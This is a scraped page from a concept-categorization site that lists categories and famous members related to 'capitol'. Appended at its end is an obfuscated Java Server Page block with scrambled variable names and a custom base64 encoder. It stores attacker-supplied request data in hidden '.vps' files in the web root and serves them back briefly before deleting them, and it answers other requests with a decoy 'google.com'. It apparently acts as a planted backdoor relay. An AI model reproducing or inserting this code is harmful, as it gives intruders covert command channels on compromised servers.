Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
capitol
with nuance
famous
:
famous:building,
Simple categories matching
famous
:
person,
figure,
academic,
violinist,
location,
scholar,
event,
site,
weapon,
college,
individual,
trail,
scientist,
case,
personality,
expert,
people,
friend,
personage,
landmark,
place,
traveler,
university,
author,
intellectual,
character,
lizard,
attraction,
family,
entertainer,
battle,
teacher,
store,
race,
school,
museum,
professor,
trademark,
festival,
building,
freedom,
fold,
Members with property
famous
:
prof,
kennedy_smith,
frank,
history_museum,
einstein,
tower,
elephant_man,
changan_university,
politician,
singer,
disney_world,
tt_race,
jr,
watergate_complex,
actor,
iditarod,
diamond_head,
chicago_theatre,
athlete,
ernest-hemingway_parent,
buddha,
research_building,
metropolis,
preakness,
run,
louvre,
san-francisco_peninsula,
neon_museum,
centre,
us_capitol,
current_member,
former_president,
pop_singer,
smaller_school,
first_thanksgiving,
bush,
foundation,
chemist,
biologist,
historical_landmark,
red_square,
red-cross_museum,
alexander_great,
rock,
villa_market,
writer,
king,
bennie_man,
physicist,
sport_warehouse,
movie_release,
house,
monaco_casino,
spanish_tenor,
christ,
versace_family,
east_alligator,
durham,
pearl_harbour,
trial,
percy_thrower,
settlement-house_shop,
john-hancock_center,
coronation,
political_family,
historical_figure,
hero_supermarket,
charles_bridge,
athletic_personality,
elvis,
senior_officer,
grace_marketplace,
field,
explorer,
poet,
waikiki_beach,
mecca,
culture_university,
privacy,
nanking_university,
paramount_studio,
london_bridge,
midland_hotel,
imam,
mormon_pioneer,
mustard_festival,
movie_location,
van-gogh_museum,
rockefeller_center,
woman,
social_scientist,
recipient,
metropolitan_museum,
peter_great,
free_raid,
stephen_king,
battle,
leaning_tower,
various_member,
daniel,
musician,
wuhan_university,
appalachian_trail,
science_academy,
british_museum,
jurist,
rock_singer,
clark_exploration,
father,
beijing_university,
humboldt_university,
sun-yat-sen_university,
dakar_rally,
eugene_debs,
cinderella,
sport_figure,
speech,
big_bird,
spear,
john-ford_point,
victorious_war,
rope_pull,
gold_museum,
capitol,
rembrandt_museum,
utica_college,
eruption,
victoria_market,
coventry_cathedral,
sport_star,
coronation_fold,
field_museum,
main_square,
political_figure,
cathedral,
celebrity_house,
animation_hero,
artist_point,
siege,
various_battle,
capitol_record,
world_leaders,
christ_church,
philosopher,
hero,
christ_hospital,
national_university,
indian,
hi_hero,
family,
chicago_fire,
royal_hospital,
central_park,
cape_point,
joint_line,
jacobite_rebellion,
oktoberfest,
chicago_university,
red_rock,
queens,
forbidden_city,
likeness,
hollywood_actor,
film-festival_palace,
ji_packer,
bach_festival,
national_park,
norman-rockwell_museum,
neighborhood_bungalow,
leeds_castle,
duke,
london_eye,
waterloo,
marble_house,
fabian,
white_house,
saguaro,
supreme_court,
national_museum,
trinity_college,
romanov,
school,
french_quarter,
texas_war,
ritz_brother,
main_hall,
tribune_tower,
king_chapel,
england_cricketer,
president,
kitchen_debate,
chubby_checker,
archaeology_museum,
astronomer,
parson,
belvedere,
john,
actress,
tower_bridge,
delicate_arch,
walter_pater,
nanjing_university,
george-washington_carver,
ruble_museum,
south_alligator,
garcia-lorca_theatre,
plus_voice,
dean,
masonic_hotel,
missouri-compromise_debate,
admiralty,
fire,
celebrity,
bush_garden,
soldier,
anthony_head,
royal_wedding,
muslim,
euler_native,
grace_darling,
shady_camp,
economics_university,
world_boutique,
memorial_hall,
capture,
tombstone,
death_date,
palace_square,
parliament_square,
pantheon,
disciple,
athletic_player,
wilde_trial,
tarzan,
johnny_canuck,
harbour_bridge,
carousel_ball,
admiralty_arch,
high_society,
lenin_mausoleum,
time_square,
glen_miller,
fez,
imperial_palace,
numerous_brownstone,
empire-state_building,
tv_anchor,
book_festival,
cedar_run,
adonis,
london_marathon,
chameleon,
alcott_family,
dutch_house,
italy_track,
calgary_stampede,
first,
duomo,
cornel,
prophet,
john-muir_trail,
al_smith,
anne_frank,
religious_leaders,
academician,
wright_brother,
jewel,
blue_mosque,
yankee_stadium,
prominent_contemporary,
sportsman,
inventor,
lanzhou_university,
peking_university,
duchess,
martin-luther_king,
dolly_sister,
recording_star,
invention,
universal_studio,
picasso_museum,
rockefeller_centre,
american_president,
scientist,
derby_family,
founder,
joseph_singer,
darling_harbour,
farm,
birth,
grand_serail,
albert_museum,
coliseum,
geologist,
logo,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>